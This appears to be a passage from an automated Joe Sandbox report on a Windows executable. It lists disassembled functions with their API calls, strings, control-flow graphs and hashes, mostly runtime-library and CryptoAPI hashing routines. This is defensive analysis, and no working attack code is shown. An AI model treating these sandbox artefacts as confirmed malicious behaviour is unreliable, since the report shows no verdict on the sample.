                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00680000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                    • API String ID: 3074076210-2104205924
                                                                                                                                                    • Opcode ID: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
                                                                                                                                                    • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                                                                    • Opcode Fuzzy Hash: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
                                                                                                                                                    • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1132 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                                                                    APIs
                                                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                                                                      • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                                                                      • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                    • String ID: i;B
                                                                                                                                                    • API String ID: 2427264223-472376889
                                                                                                                                                    • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                    • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                                                                    • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                    • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1135 42fb64-42fb77 call 428520 1138 42fba5-42fbaa call 428565 1135->1138 1139 42fb79-42fb8c call 428af7 1135->1139 1144 42fb99-42fba0 call 42fbab 1139->1144 1145 42fb8e call 42fe47 1139->1145 1144->1138 1148 42fb93 1145->1148 1148->1144
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0042FB7B
                                                                                                                                                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                      • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                    • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                                                                      • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                                                                      • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                                                                      • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                                                                      • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                                                                      • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                                                                      • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1282695788-0
                                                                                                                                                    • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                    • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                                                                    • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                    • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041CC50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1149 41cc50-41cc62 call 423b4c 1152 41cc83-41cc88 call 44f1bb 1149->1152 1153 41cc64-41cc69 1149->1153 1155 41cc71 1153->1155 1156 41cc6b-41cc6f 1153->1156 1158 41cc74-41cc7b 1155->1158 1156->1158 1159 41cc7d 1158->1159 1160 41cc7f-41cc80 1158->1160 1159->1160
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0041CC83
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 657562460-0
                                                                                                                                                    • Opcode ID: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                                                    • Instruction ID: 52da3c53c07101cb0fed2dfe03d77d14ca015ab54627e4d196b0d3cf544a0d43
                                                                                                                                                    • Opcode Fuzzy Hash: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                                                    • Instruction Fuzzy Hash: 9AE026303803049BEB08DE12C890ABB7755DF92740B04803EAC0E8B361FA34DD04D7E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1161 427f3d-427f47 call 427e0e 1163 427f4c-427f50 1161->1163
                                                                                                                                                    APIs
                                                                                                                                                    • _doexit.LIBCMT ref: 00427F47
                                                                                                                                                      • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2158581194-0
                                                                                                                                                    • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                    • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                                                                    • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                    • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                                                                                                                                    • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                                                                                                                                    • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00481C15
                                                                                                                                                    • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00481D45
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00481F03
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00481FF1
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482066
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482095
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004820FB
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482118
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482187
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004821A4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                                                                    • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                    • API String ID: 842291066-1723836103
                                                                                                                                                    • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                                    • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                                                                                                                                                    • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                                    • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                                                                    • _memset.LIBCMT ref: 004110CA
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                                                                    • _malloc.LIBCMT ref: 00411100
                                                                                                                                                    • _memset.LIBCMT ref: 0041110B
                                                                                                                                                    • _sprintf.LIBCMT ref: 0041112E
                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                    • String ID: %.2X
                                                                                                                                                    • API String ID: 2451520719-213608013
                                                                                                                                                    • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                    • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                                                                    • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                    • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00411915
                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                                                                    • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                                                                    • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                                                                    • _memset.LIBCMT ref: 004119B8
                                                                                                                                                    • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                                                                      • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                    • String ID: failed with error
                                                                                                                                                    • API String ID: 4182478520-946485432
                                                                                                                                                    • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                                    • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                                                                    • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                                    • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                                      • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                                                                    • _memmove.LIBCMT ref: 0040F9EA
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                                                                    • _memmove.LIBCMT ref: 0040FADA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 273148273-0
                                                                                                                                                    • Opcode ID: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
                                                                                                                                                    • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                                                                    • Opcode Fuzzy Hash: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
                                                                                                                                                    • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                                                                    • _memset.LIBCMT ref: 0040E98E
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                                                                    • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                    • String ID: %.2X
                                                                                                                                                    • API String ID: 1084002244-213608013
                                                                                                                                                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                    • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                                                                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                    • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
